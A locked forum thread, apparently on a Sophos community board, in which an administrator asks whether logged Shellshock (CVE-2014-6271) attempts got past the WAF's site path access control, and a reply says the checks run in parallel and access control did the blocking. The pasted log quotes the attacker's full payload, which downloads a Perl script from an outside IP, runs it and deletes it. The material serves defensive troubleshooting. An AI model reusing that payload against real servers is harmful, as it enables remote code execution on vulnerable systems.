This discussion has been locked.
You can no longer post new replies to this discussion. If you have a question you can start a new discussion

Did IP with BASH attack get through Site Path Routing restrictions?

We have an internal web site for users in various geographical locations available through a public IP.  The site is only available to a small number of internal networks/IPs.  The site is set up on the WAF and we restrict traffic using Site Path Routing (settings below) to only our pre-defined networks/IPs.  The site is/was in monitor mode in the WAF firewall profile.  When I was reviewing the Logging & Reporting>>Webserver Protection log details and I see that a public IP had attempted a number of BASH Attacks which was strange because the site is set up to only allow certain pre-defined networks.

When I look at the logs, shown below, the first entry is ‘Pattern match’ followed by ‘blacklist’ then followed by ‘client denied by server configuration’ and lastly the 403 error.

It is strange to me that Pattern match is first.  Why is it inspecting the pattern before the IP checks?  Why should it care about the pattern match if the IP is not allowed to access the site?  If the IP is not allowed, then it seems like it should just toss the request and respond with a 403 error.
Keep in mind that the site was in monitor mode, although the site is on a Windows server.  

My question is: The Webserver Protection log details page shows the BASH Attack, although the site is restricted to only certain networks/IPs.  Did the BASH Attack attempt go through?  - I know it’s a Windows server but I just like some clarity in how this works. I would like to think that the attacks did not go through just because the IP was restricted, although it was on the blacklist anyway, but then why is it showing as being pattern matched?  The logs say that the client was denied, but was their BASH Attack discarded?  Can someone clarify this?

Web site WAF settings:
WebServer Protection>>Web Application Firewall>>Site Path Routing
Access Control checked
Allowed network list all allowed networks that I have defined.
Denied network – empty

Logging & Reporting>>Webserver Protection log details:
969990  CVE-2014-6271 - Bash Attack

Web Server protection WAF logs:
sophos1 reverseproxy: [DateTime] [security2:error] [pid/tid] [client 206.xx.xx.x] ModSecurity: Warning. Pattern match "^\\(\\s*\\)\\s+{" at REQUEST_HEADERS:User-Agent. [file "/usr/apache/conf/waf/modsecurity_crs_generic_attacks.conf"] [line "258"] [id "969990"] [msg "CVE-2014-6271 - Bash Attack"] [data "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5cr\x5cn\x5cr\x5cnXSUCCESS!\x22;system(\x22wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf /tmp/cox.pl*\x22);'"] [severity "CRITICAL"] [tag "CVE-2014-6271"] [hostname "x.x.x.x"] [uri "/"] [unique_id "VjoEFgo-FAQAAEUO0n4AAAAX"]

sophos1 reverseproxy: [DateTime] [authz_blacklist:warn] [pid/tid] [client 206.xx.xx.x:45019] Client is listed on DNSRBL black.rbl.ctipd.astaro.local

sophos1 reverseproxy: [DateTime] [authz_core:error] [pid/tid] [client 206.xx.xx.x:45019] AH01630: client denied by server configuration: proxy:balancer://6htuyi75re3/

sophos1 reverseproxy: id="0299" srcip="206.xx.xx.x" localip="10.0.0.10" size="209" user="-" host="206.xx.xx.x" method="GET" statuscode="403" reason="-" extra="-" exceptions="-" time="6520" url="/" server="x.x.x.x" referer="-" cookie="-" set-cookie="-"

---- More similar to this as well not listed ----

Other errors:
sophos1 reverseproxy: [DateTime] [url_hardening:error] [pid/tid] [client 206.xx.xx.x:46849] Hostname in HTTP request (x.x.x.x) does not match the server name (REF_RevFroVwsMail_redirect_ssl)

sophos1 reverseproxy: id="0299" srcip="206.xx.xx.x" localip="10.0.0.10" size="218" user="-" host="206.xx.xx.x" method="GET" statuscode="403" reason="-" extra="-" exceptions="-" time="417" url="/index.cgi" server="REF_RevFroVwsMail_redirect_ssl" referer="-" cookie="-" set-cookie="-"

sophos1 reverseproxy: [DateTime] [url_hardening:error] [pid/tid] [client 206.xx.xx.x:34101] Hostname in HTTP request (x.x.x.x) does not match the server name (REF_RevFroVwsMail_redirect_ssl)

sophos1 reverseproxy: id="0299" srcip="206.xx.xx.x" localip="10.0.0.10" size="226" user="-" host="206.xx.xx.x" method="GET" statuscode="403" reason="-" extra="-" exceptions="-" time="522" url="/cgi-bin/query.cgi" server="REF_RevFroVwsMail_redirect_ssl" referer="-" cookie="-" set-cookie="-"

sophos1 reverseproxy: [DateTime] [url_hardening:error] [pid/tid] [client 206.xx.xx.x:34141] Hostname in HTTP request (x.x.x.x) does not match the server name (REF_RevFroVwsMail_redirect_ssl)

sophos1 reverseproxy: id="0299" srcip="206.xx.xx.x" localip="10.0.0.10" size="228" user="-" host="206.xx.xx.x" method="GET" statuscode="403" reason="-" extra="-" exceptions="-" time="508" url="/cgi-bin/counter.cgi" server="REF_RevFroVwsMail_redirect_ssl" referer="-" cookie="-" set-cookie="-"

---- More similar to this as well not listed ----


This thread was automatically locked due to age.
Parents
  • Hi,

    the protection features are checked in parallel, therefore you get all three messages for ModSecurity, DNSRBL and Access Control. The request would be blocked if just one of them would be active. As all of them are active the actual blocking is done due to Access Control.

    Sabine
Reply
  • Hi,

    the protection features are checked in parallel, therefore you get all three messages for ModSecurity, DNSRBL and Access Control. The request would be blocked if just one of them would be active. As all of them are active the actual blocking is done due to Access Control.

    Sabine
Children
No Data